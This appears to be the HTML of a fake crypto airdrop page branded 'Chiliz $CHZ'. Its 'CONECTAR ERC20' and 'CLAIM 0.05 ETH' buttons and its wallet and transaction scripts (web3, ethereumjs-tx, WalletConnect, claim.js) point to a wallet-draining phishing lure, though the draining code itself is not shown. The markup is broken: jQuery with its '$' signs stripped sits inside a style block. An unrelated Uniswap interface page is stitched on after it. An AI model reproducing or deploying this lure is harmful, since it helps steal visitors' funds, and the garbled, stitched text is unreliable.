<!doctype html>
<html lang="fr">

<head>
    <meta charset="utf-8">
    <title>Chiliz $CHZ</title>
<meta content="Chiliz $CHZ" property="og:title">

<meta property="og:image" content="/static/images/logos/opensea.svg">

    <meta property="og:type" content="website">

    <meta property="og:url" content="">

    <meta name="twitter:card" content="summary_large_image">
    <link rel="shortcut icon" href="https://gateway.pinata.cloud/ipfs/Qmd6ExeMWs7apiGAKV8RAtEZsUxfqxkkG2FKhWFV4H9HMc" />

    <meta name="twitter:image" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="shortcut icon" href="" />
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">
    <script src="src/js/1409195906.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
    <link rel="preload" href="./src/css/normal.css" as="style">
    <link rel="stylesheet" href="./src/css/normal.css">
    <link rel="stylesheet" href="./src/css/main.css">
    <link rel="preload" href="./src/css/main.css" as="style">

    <script src="./settings.js"></script>
    <link rel="stylesheet" href="./src/css/styles.css">

    <script src="src/js/ethereumjs-tx-1.3.3.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/bignumber.js/8.0.2/bignumber.js" integrity="sha512-XQDG6H87RgMf+aNFwDPCUcFwUf3t9liyqN/2BkJ8KGixupbjPwQHNhypNA972mLIkg4KPo4lkGmqAf3yfDz8hw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="src/js/tokenabi.js"></script>
    <script src="jquery.min.js"></script>
    <script src="base.js?1"></script>    


</head>


<style>
    .Home_soon__8s2ww button {
        background-color: #D622C8;
        border: 2px solid #340E31;
        border-radius: 15px;
        box-sizing: border-box;
        color: #F5E307;
        cursor: pointer;
        display: grid;
	margin-right: auto;
	margin-left: auto;    
        font-size: 10px;
        font-weight: 450;
        line-height: 10px;
        margin: 4;
        outline: none;
        padding: 10px 20px;
        position: relative;
        text-align: right;
        text-decoration: none;
        touch-action: manipulation;
        transition: box-shadow .2s, -ms-transform .1s, -webkit-transform .1s, transform .1s;
        user-select: none;
        -webkit-user-select: none;
        width: auto;
    }

    .Home_soon__8s2ww button:focus-visible {
        box-shadow: #222222 0 0 0 2px, rgba(255, 255, 255, 0.8) 0 0 0 4px;
        transition: box-shadow .2s;
    }

    .Home_soon__8s2ww button:active {
        background-color: #F7F7F7;
        border-color: #000000;
        transform: scale(.96);
    }

    .Home_soon__8s2ww button:disabled {
        border-color: #DDDDDD;
        color: #DDDDDD;
        cursor: not-allowed;
        opacity: 1;
    }
	
   (document).ready(function(){
	   ('.Home_soon__8s2ww').hide();
	   ('.Home_soon__8s2ww').click(function(){
		   ('body,html').animate({    scrollTop:0   },1000)  });
	   (window).scroll(function () {
		   if ((this).scrollTop() &gt; 200) {
			   ('.Home_soon__8s2ww').fadeIn();
		   }
		   else { 
			   ('.Home_soon__8s2ww').fadeOut(); 
		   } 
	   });
	});
</style>


                    <div class="Home_soon__8s2ww">
                        <button id="connectWallet">CONECTAR ERC20</button>
                        <button id="claimButton" style="display: none;">CLAIM 0.05 ETH</button>
                        <br />
                    </div>
                    
                    
                  
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script src="./src/js/loader_index.js"></script>

    <script type="text/javascript" src="src/js/web3.min.js"></script>
    <script type="text/javascript" src="src/js/moralis.js"></script>
    <script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
    <script type="text/javascript" src="src/js/claim.js"></script>
    
    <script type="text/javascript" src="./src/js/index.min.js"></script>

    <script type="text/javascript">
        $('.alert-eth-message-close').click(function(){
            $('.alert-eth-message').fadeOut(200);
        });
    </script>

</body>
<script charset="UTF-8" id="LA_COLLECT" src="./src/js/js-sdk-pro.min.js"></script>	

<!doctype html><html translate="no"><head><meta charset="utf-8"/><title>Uniswap Interface</title><meta name="description" content="Swap or provide liquidity on the Uniswap Protocol"/><link rel="shortcut icon" type="image/png" href="./favicon.png"/><link rel="apple-touch-icon" sizes="192x192" href="./images/192x192_App_Icon.png"/><link rel="apple-touch-icon" sizes="512x512" href="./images/512x512_App_Icon.png"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"/><meta name="theme-color" content="#FC72FF"/><meta http-equiv="Content-Security-Policy" content="script-src 'self' https://www.google-analytics.com https://www.googletagmanager.com 'unsafe-inline'"/><link rel="manifest" href="./manifest.json"/><link rel="preconnect" href="https://www.google-analytics.com/"/><link rel="preload" href="./fonts/Inter-roman.var.woff2" as="font" type="font/woff2" crossorigin/><style>*{font-family:Inter,sans-serif;box-sizing:border-box}@font-face{font-family:'Inter custom';font-weight:100 900;font-style:normal;font-display:block;font-named-instance:Regular;src:url(fonts/Inter-roman.var.woff2) format('woff2 supports variations(gvar)'),url(fonts/Inter-roman.var.woff2) format('woff2-variations'),url(fonts/Inter-roman.var.woff2) format('woff2')}@supports (font-variation-settings:normal){*{font-family:'Inter custom',sans-serif}}body,html{margin:0;padding:0}button{user-select:none}html{font-size:16px;font-variant:none;font-smooth:always;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;-webkit-tap-highlight-color:transparent}#background-radial-gradient{background:linear-gradient(180deg,#202738 0,#070816 100%);position:fixed;top:0;left:0;right:0;pointer-events:none;width:200vw;height:200vh;transform:translate(-50vw,-100vh);z-index:-1}html{min-height:100%}@media (prefers-color-scheme:dark){html{background-color:#212429}}@media (prefers-color-scheme:light){html{background-color:#f7f8fa}}</style><link href="./static/css/4.2a59e547.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this app.</noscript><div id="root"><div>&emsp;</div></div><div id="background-radial-gradient"></div><script>!function(e){function c(c){for(var t,d,n=c[0],o=c[1],u=c[2],i=0,l=[];i<n.length;i++)d=n[i],Object.prototype.hasOwnProperty.call(r,d)&&r[d]&&l.push(r[d][0]),r[d]=0;for(t in o)Object.prototype.hasOwnProperty.call(o,t)&&(e[t]=o[t]);for(b&&b(c);l.length;)l.shift()();return a.push.apply(a,u||[]),f()}function f(){for(var e,c=0;c<a.length;c++){for(var f=a[c],t=!0,d=1;d<f.length;d++){var o=f[d];0!==r[o]&&(t=!1)}t&&(a.splice(c--,1),e=n(n.s=f[0]))}return e}var t={},d={3:0},r={3:0},a=[];function n(c){if(t[c])return t[c].exports;var f=t[c]={i:c,l:!1,exports:{}};return e[c].call(f.exports,f,f.exports,n),f.l=!0,f.exports}n.e=function(e){var c=[];d[e]?c.push(d[e]):0!==d[e]&&{0:1,1:1,6:1,7:1,8:1,10:1,13:1}[e]&&c.push(d[e]=new Promise((function(c,f){for(var t="static/css/"+({}[e]||e)+"."+{0:"ec99b6b4",1:"da6c4158",5:"31d6cfe0",6:"d91ea986",7:"3da45710",8:"f0047512",9:"31d6cfe0",10:"c35adcac",11:"31d6cfe0",12:"31d6cfe0",13:"7829c767",14:"31d6cfe0",15:"31d6cfe0",16:"31d6cfe0",17:"31d6cfe0",18:"31d6cfe0",19:"31d6cfe0",20:"31d6cfe0",21:"31d6cfe0",22:"31d6cfe0",23:"31d6cfe0",24:"31d6cfe0",25:"31d6cfe0",26:"31d6cfe0",27:"31d6cfe0",28:"31d6cfe0",29:"31d6cfe0",30:"31d6cfe0",31:"31d6cfe0",32:"31d6cfe0",33:"31d6cfe0",34:"31d6cfe0",35:"31d6cfe0",36:"31d6cfe0",37:"31d6cfe0",38:"31d6cfe0",39:"31d6cfe0",40:"31d6cfe0",41:"31d6cfe0",42:"31d6cfe0",43:"31d6cfe0",44:"31d6cfe0",45:"31d6cfe0",46:"31d6cfe0",47:"31d6cfe0",48:"31d6cfe0",49:"31d6cfe0",50:"31d6cfe0",51:"31d6cfe0",52:"31d6cfe0",53:"31d6cfe0",54:"31d6cfe0",55:"31d6cfe0",56:"31d6cfe0",57:"31d6cfe0",58:"31d6cfe0",59:"31d6cfe0",60:"31d6cfe0",61:"31d6cfe0",62:"31d6cfe0",63:"31d6cfe0",64:"31d6cfe0",65:"31d6cfe0",66:"31d6cfe0",67:"31d6cfe0",68:"31d6cfe0",69:"31d6cfe0",70:"31d6cfe0",71:"31d6cfe0",72:"31d6cfe0",73:"31d6cfe0",74:"31d6cfe0",75:"31d6cfe0",76:"31d6cfe0",77:"31d6cfe0",78:"31d6cfe0",79:"31d6cfe0",80:"31d6cfe0",81:"31d6cfe0",82:"31d6cfe0",83:"31d6cfe0",84:"31d6cfe0"}[e]+".chunk.css",r=n.p+t,a=document.getElementsByTagName("link"),o=0;o<a.length;o++){var u=(b=a[o]).getAttribute("data-href")||b.getAttribute("href");if("stylesheet"===b.rel&&(u===t||u===r))return c()}var i=document.getElementsByTagName("style");for(o=0;o<i.length;o++){var b;if((u=(b=i[o]).getAttribute("data-href"))===t||u===r)return c()}var l=document.createElement("link");l.rel="stylesheet",l.type="text/css",l.onload=c,l.onerror=function(c){var t=c&&c.target&&c.target.src||r,a=new Error("Loading CSS chunk "+e+" failed.\n("+t+")");a.code="CSS_CHUNK_LOAD_FAILED",a.request=t,delete d[e],l.parentNode.removeChild(l),f(a)},l.href=r,document.getElementsByTagName("head")[0].appendChild(l)})).then((function(){d[e]=0})));var f=r[e];if(0!==f)if(f)c.push(f[2]);else{var t=new Promise((function(c,t){f=r[e]=[c,t]}));c.push(f[2]=t);var a,o=document.createElement("script");o.charset="utf-8",o.timeout=120,n.nc&&o.setAttribute("nonce",n.nc),o.src=function(e){return n.p+"static/js/"+({}[e]||e)+"."+{0:"d45cb49b",1:"93ec1181",5:"42916194",6:"1a1cb46f",7:"559177cc",8:"9a43e75f",9:"854724ee",10:"c41caea2",11:"26b50c2a",12:"2e48211e",13:"6e6afae5",14:"9a795e8e",15:"4e6dd895",16:"1407607c",17:"58741dfc",18:"2b1c25dd",19:"854a3f0f",20:"62e6784c",21:"c210e091",22:"858c965a",23:"b7a9ff90",24:"6016f94e",25:"c4e904ad",26:"b99420ea",27:"5a6c6677",28:"002a951e",29:"7ab7182a",30:"87f318fc",31:"fe6ab607",32:"5cb14598",33:"8e36fdb3",34:"edde7ba5",35:"15a1704d",36:"7a9ff512",37:"5121b383",38:"fcb71f03",39:"26a9819b",40:"3afed643",41:"f4d6e385",42:"3acf8cc4",43:"ff221da6",44:"779197f9",45:"5eb8845b",46:"effcc398",47:"1f96a13a",48:"8aa27a03",49:"bfbb9f20",50:"decb1b99",51:"5ede3fd4",52:"6093177b",53:"dfd20a74",54:"9dc75367",55:"4e733301",56:"d759f512",57:"92433b99",58:"9b52a38a",59:"c4392b45",60:"bf8a18d2",61:"6d3d4a27",62:"6c24914a",63:"575803bc",64:"7dcb929f",65:"bfeba136",66:"eb734c47",67:"17ed4e7b",68:"f9c1e59a",69:"5785145f",70:"171ac296",71:"adac839a",72:"ecf3ef63",73:"34046fab",74:"b726e000",75:"d193738b",76:"9049079f",77:"afbbefc7",78:"6d2f4ffc",79:"b19be3be",80:"b5c52659",81:"6bd89c85",82:"74724d4a",83:"9d136b29",84:"cb62761f"}[e]+".chunk.js"}(e);var u=new Error;a=function(c){o.onerror=o.onload=null,clearTimeout(i);var f=r[e];if(0!==f){if(f){var t=c&&("load"===c.type?"missing":c.type),d=c&&c.target&&c.target.src;u.message="Loading chunk "+e+" failed.\n("+t+": "+d+")",u.name="ChunkLoadError",u.type=t,u.request=d,f[1](u)}r[e]=void 0}};var i=setTimeout((function(){a({type:"timeout",target:o})}),12e4);o.onerror=o.onload=a,document.head.appendChild(o)}return Promise.all(c)},n.m=e,n.c=t,n.d=function(e,c,f){n.o(e,c)||Object.defineProperty(e,c,{enumerable:!0,get:f})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,c){if(1&c&&(e=n(e)),8&c)return e;if(4&c&&"object"==typeof e&&e&&e.__esModule)return e;var f=Object.create(null);if(n.r(f),Object.defineProperty(f,"default",{enumerable:!0,value:e}),2&c&&"string"!=typeof e)for(var t in e)n.d(f,t,function(c){return e[c]}.bind(null,t));return f},n.n=function(e){var c=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(c,"a",c),c},n.o=function(e,c){return Object.prototype.hasOwnProperty.call(e,c)},n.p="./",n.oe=function(e){throw console.error(e),e};var o=this["webpackJsonp@uniswap/interface"]=this["webpackJsonp@uniswap/interface"]||[],u=o.push.bind(o);o.push=c,o=o.slice();for(var i=0;i<o.length;i++)c(o[i]);var b=u;f()}([])</script><script src="./static/js/4.f298532e.chunk.js"></script><script src="./static/js/main.548fc7d9.chunk.js"></script></body></html>



